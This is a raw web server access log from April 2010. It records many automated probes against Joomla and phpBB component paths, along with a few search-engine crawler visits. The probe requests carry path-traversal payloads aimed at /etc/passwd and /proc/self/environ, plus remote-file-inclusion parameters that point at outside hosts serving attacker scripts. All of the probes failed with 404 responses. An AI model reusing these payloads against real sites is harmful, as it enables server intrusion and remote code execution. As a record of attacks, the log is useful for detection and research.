211.203.180.144 - - [25/Apr/2010:03:20:54 -0500] "GET /logs/access_log.1212105600//language/lang_german/lang_main_album.php?phpbb_root_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.79"
70.38.11.201 - - [25/Apr/2010:03:26:45 -0500] "GET ///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
70.38.11.201 - - [25/Apr/2010:03:26:45 -0500] "GET /logs/access_log.1225929600///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
70.38.11.201 - - [25/Apr/2010:03:26:45 -0500] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
72.30.161.241 - - [25/Apr/2010:03:41:23 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.241 - - [25/Apr/2010:03:41:23 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.204.169.136 - - [25/Apr/2010:03:42:05 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
72.52.203.55 - - [25/Apr/2010:03:42:13 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
209.97.202.234 - - [25/Apr/2010:03:42:20 -0500] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
209.97.202.234 - - [25/Apr/2010:03:42:23 -0500] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
209.97.202.234 - - [25/Apr/2010:03:42:23 -0500] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
209.97.202.234 - - [25/Apr/2010:03:42:23 -0500] "GET /logs/access_log.1245369600//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
209.97.202.234 - - [25/Apr/2010:03:42:23 -0500] "GET /logs/access_log.1245369600//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
209.97.202.234 - - [25/Apr/2010:03:42:23 -0500] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
195.216.234.1 - - [25/Apr/2010:03:42:42 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
204.14.3.162 - - [25/Apr/2010:03:42:44 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
72.52.203.55 - - [25/Apr/2010:03:43:12 -0500] "GET /logs///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
72.52.203.55 - - [25/Apr/2010:03:43:12 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
69.57.164.32 - - [25/Apr/2010:03:43:16 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
74.204.169.136 - - [25/Apr/2010:03:43:40 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
74.204.169.136 - - [25/Apr/2010:03:43:41 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
74.204.169.136 - - [25/Apr/2010:03:43:41 -0500] "GET /logs///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
77.221.130.13 - - [25/Apr/2010:03:43:55 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
77.221.130.13 - - [25/Apr/2010:03:43:55 -0500] "GET /logs/access_log.1265760000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
77.221.130.13 - - [25/Apr/2010:03:43:55 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
195.216.234.1 - - [25/Apr/2010:03:43:55 -0500] "GET /logs///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
195.216.234.1 - - [25/Apr/2010:03:43:55 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
69.57.164.32 - - [25/Apr/2010:03:44:37 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
69.57.164.32 - - [25/Apr/2010:03:44:37 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
69.57.164.32 - - [25/Apr/2010:03:44:37 -0500] "GET /logs///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
72.52.203.55 - - [25/Apr/2010:03:45:01 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
72.52.203.55 - - [25/Apr/2010:03:45:01 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
72.52.203.55 - - [25/Apr/2010:03:45:01 -0500] "GET /logs///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
69.57.164.32 - - [25/Apr/2010:03:45:29 -0500] "GET /logs///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
69.57.164.32 - - [25/Apr/2010:03:45:29 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
195.216.234.1 - - [25/Apr/2010:03:45:44 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
195.216.234.1 - - [25/Apr/2010:03:45:44 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
195.216.234.1 - - [25/Apr/2010:03:45:44 -0500] "GET /logs///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
207.46.204.197 - - [25/Apr/2010:03:45:55 -0500] "GET /logs/access_log.1255392000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
204.14.3.162 - - [25/Apr/2010:03:46:04 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
204.14.3.162 - - [25/Apr/2010:03:46:05 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
204.14.3.162 - - [25/Apr/2010:03:46:05 -0500] "GET /logs///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
209.97.202.234 - - [25/Apr/2010:03:46:50 -0500] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
209.97.202.234 - - [25/Apr/2010:03:46:50 -0500] "GET /logs/access_log.1262476800//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
209.97.202.234 - - [25/Apr/2010:03:46:50 -0500] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.160.224.208 - - [25/Apr/2010:03:48:02 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
204.14.3.162 - - [25/Apr/2010:03:48:25 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
204.14.3.162 - - [25/Apr/2010:03:48:25 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
204.14.3.162 - - [25/Apr/2010:03:48:25 -0500] "GET /logs///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
83.148.64.145 - - [25/Apr/2010:03:48:33 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 345 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:48:33 -0500] "GET /logs/access_log.1268956800%20%20//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 374 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:48:33 -0500] "GET /logs//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 350 "-""Mozilla/5.0"
74.204.169.136 - - [25/Apr/2010:03:48:50 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
74.204.169.136 - - [25/Apr/2010:03:48:50 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
74.204.169.136 - - [25/Apr/2010:03:48:50 -0500] "GET /logs///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
83.148.64.145 - - [25/Apr/2010:03:48:50 -0500] "GET /logs//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 350 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:48:50 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 345 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:48:50 -0500] "GET /logs/access_log.1268956800%20%20//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 374 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:48:52 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 345 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:48:52 -0500] "GET /logs//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 350 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:48:52 -0500] "GET /logs/access_log.1268956800%20%20//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 374 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:48:57 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 345 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:48:57 -0500] "GET /logs//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 350 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:48:57 -0500] "GET /logs/access_log.1268956800%20%20//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 374 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:49:03 -0500] "GET /logs/access_log.1270684800%20%20//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 374 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:49:15 -0500] "GET /logs/access_log.1270684800%20%20//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 374 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:49:16 -0500] "GET /logs/access_log.1270684800%20%20//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 374 "-""Mozilla/5.0"
83.148.64.145 - - [25/Apr/2010:03:49:22 -0500] "GET /logs/access_log.1270684800%20%20//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??%20? HTTP/1.1" 404 374 "-""Mozilla/5.0"
74.204.169.136 - - [25/Apr/2010:03:49:55 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
195.216.234.1 - - [25/Apr/2010:03:49:56 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
204.14.3.162 - - [25/Apr/2010:03:50:03 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
72.52.203.55 - - [25/Apr/2010:03:50:07 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
72.52.203.55 - - [25/Apr/2010:03:50:07 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
72.52.203.55 - - [25/Apr/2010:03:50:07 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
72.52.203.55 - - [25/Apr/2010:03:50:07 -0500] "GET /logs///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
69.57.164.32 - - [25/Apr/2010:03:50:19 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
69.57.164.32 - - [25/Apr/2010:03:50:41 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
69.57.164.32 - - [25/Apr/2010:03:50:41 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
69.57.164.32 - - [25/Apr/2010:03:50:41 -0500] "GET /logs///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
195.216.234.1 - - [25/Apr/2010:03:50:46 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
195.216.234.1 - - [25/Apr/2010:03:50:46 -0500] "GET ///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
195.216.234.1 - - [25/Apr/2010:03:50:47 -0500] "GET /logs///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
174.121.83.94 - - [25/Apr/2010:03:51:13 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.121.83.94 - - [25/Apr/2010:03:51:13 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
174.121.83.94 - - [25/Apr/2010:03:51:13 -0500] "GET /logs/access_log.1219708800%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.216.234.1 - - [25/Apr/2010:03:51:17 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
195.216.234.1 - - [25/Apr/2010:03:51:18 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
195.216.234.1 - - [25/Apr/2010:03:51:18 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
66.113.99.70 - - [25/Apr/2010:03:51:25 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.113.99.70 - - [25/Apr/2010:03:51:25 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
66.113.99.70 - - [25/Apr/2010:03:51:25 -0500] "GET /logs/access_log.1219708800%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
77.221.130.13 - - [25/Apr/2010:03:51:50 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
77.221.130.13 - - [25/Apr/2010:03:51:50 -0500] "GET /logs/access_log.1214006400%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
77.221.130.13 - - [25/Apr/2010:03:51:50 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
74.204.169.136 - - [25/Apr/2010:03:53:03 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
74.204.169.136 - - [25/Apr/2010:03:53:03 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
74.204.169.136 - - [25/Apr/2010:03:53:03 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
77.221.130.13 - - [25/Apr/2010:03:53:23 -0500] "GET /logs/access_log.1228089600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
204.14.3.162 - - [25/Apr/2010:03:54:08 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
204.14.3.162 - - [25/Apr/2010:03:54:08 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
204.14.3.162 - - [25/Apr/2010:03:54:08 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
72.52.203.55 - - [25/Apr/2010:03:54:14 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
72.52.203.55 - - [25/Apr/2010:03:54:14 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
72.52.203.55 - - [25/Apr/2010:03:54:14 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
69.57.164.32 - - [25/Apr/2010:03:54:41 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
69.57.164.32 - - [25/Apr/2010:03:54:41 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
69.57.164.32 - - [25/Apr/2010:03:54:41 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.6.154.57 - - [25/Apr/2010:03:54:45 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.6.154.57 - - [25/Apr/2010:03:54:45 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
200.6.154.57 - - [25/Apr/2010:03:54:45 -0500] "GET /logs/access_log.1219708800%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
